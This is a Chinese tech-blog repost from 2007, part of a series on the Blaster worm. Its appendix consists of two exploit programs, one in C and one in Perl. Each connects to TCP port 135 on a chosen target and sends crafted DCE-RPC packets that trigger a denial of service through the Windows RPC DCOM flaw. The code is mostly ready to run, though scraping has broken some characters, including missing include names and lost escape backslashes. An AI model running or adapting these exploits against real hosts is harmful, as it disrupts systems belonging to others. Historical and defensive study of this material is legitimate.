ITPub博客

首页 > IT基础架构 > 网络安全 > 冲击波病毒内幕点滴(2) (转)

冲击波病毒内幕点滴(2) (转)

原创 网络安全 作者:amyz 时间:2007-11-16 16:52:05 0 删除 编辑
冲击波病毒内幕点滴(2) (转)[@more@]

附1XML:namespace prefix = o ns = "urn:schemas-microsoft-com:Office:office" />

测试代码

#include

#include

#include

#include

#include

#include

 

unsigned char bindstr[]={

0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,

0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,

0xA0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,

0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,

0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

 

unsigned char request[]={

0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x13,0x00,0x00,0x00,

0x90,0x00,0x00,0x00,0x01,0x00,0x03,0x00,0x05,0x00,0x06,0x01,0x00,0x00,0x00,0x00,

0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,

0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,

0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};

 

 

 

void main(int argc,char ** argv)

{

WSADATA WSAData;

int i;

SOCKET sock;

SOCKADDR_IN addr_in;

 

short port=135;

unsigned char buf1[0x1000];

printf("RPC Dcom Dos Vulnerability diSCOveried by Xfocus.orgn");

printf("Code by FlashSky,Flashsky@xfocus.org,benjurry,benjurry@xfocus.orgn");

printf("Welcome to http://www.xfocus.NETn");

if(argc<2)

{

printf("useage:%s targetn",argv[0]);

exit(1);

}

 

 

if (WSAStartup(MAKEword(2,0),&WSAData)!=0)

{

printf("WSAStartup error.Error:%dn",WSAGetLastError());

return;

}

 

addr_in.sin_family=AF_INET;

addr_in.sin_port=htons(port);

addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);

 

if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)

{

printf("Socket failed.Error:%dn",WSAGetLastError());

return;

}

if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)

{

printf("Connect failed.Error:%d",WSAGetLastError());

return;

}

if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR)

{

printf("Send failed.Error:%dn",WSAGetLastError());

return;

}

 

i=recv(sock,buf1,1024,MSG_PEEK);

if (send(sock,request,sizeof(request),0)==SOCKET_ERROR)

{

printf("Send failed.Error:%dn",WSAGetLastError());

return;

}

i=recv(sock,buf1,1024,MSG_PEEK);

}

 

 

#!/usr/bin/perl -w

# By SecurITeam's Experts

my $bindstr = "x05x00x0Bx03x10x00x00x00x48x00x00x00x7Fx00x00x00xD0x16xD0x16x00x00x00x00x01x00x00x00x01x00x01x00xA0x01x00x00x00x00x00x00xC0x00x00x00x00x00x00x46x00x00x00x00x04x5Dx88x8AxEBx1CxC9x11x9FxE8x08x00x2Bx10x48x60x02x00x00x00";

 

my $request = "x05x00x00x03x10x00x00x00x48x00x00x00x13x00x00x00x90x00x00x00x01x00x03x00x05x00x06x01x00x00x00x00x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x00x00x00x00x00x00x00x00";

 

use Socket;

$proto = getprotobyname('tcp');

socket(S, PF_INET, SOCK_STREAM, $proto) || die("Socket problemsn");

 

$ip = $ARGV[0];

$target = .net_aton($IP);

$paddr = sockaddr_in(135, $target);

connect(S, $paddr) || die "connect: $!";

select(S); $|=1;

print $bindstr;

sleep(2);

print $request;

sleep(2);

select(STDOUT);

close(S);

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/10752019/viewspace-982668/,如需转载,请注明出处,否则将追究法律责任。

请登录后发表评论 登录
全部评论
  • 博文量
    3984
  • 访问量
    7364194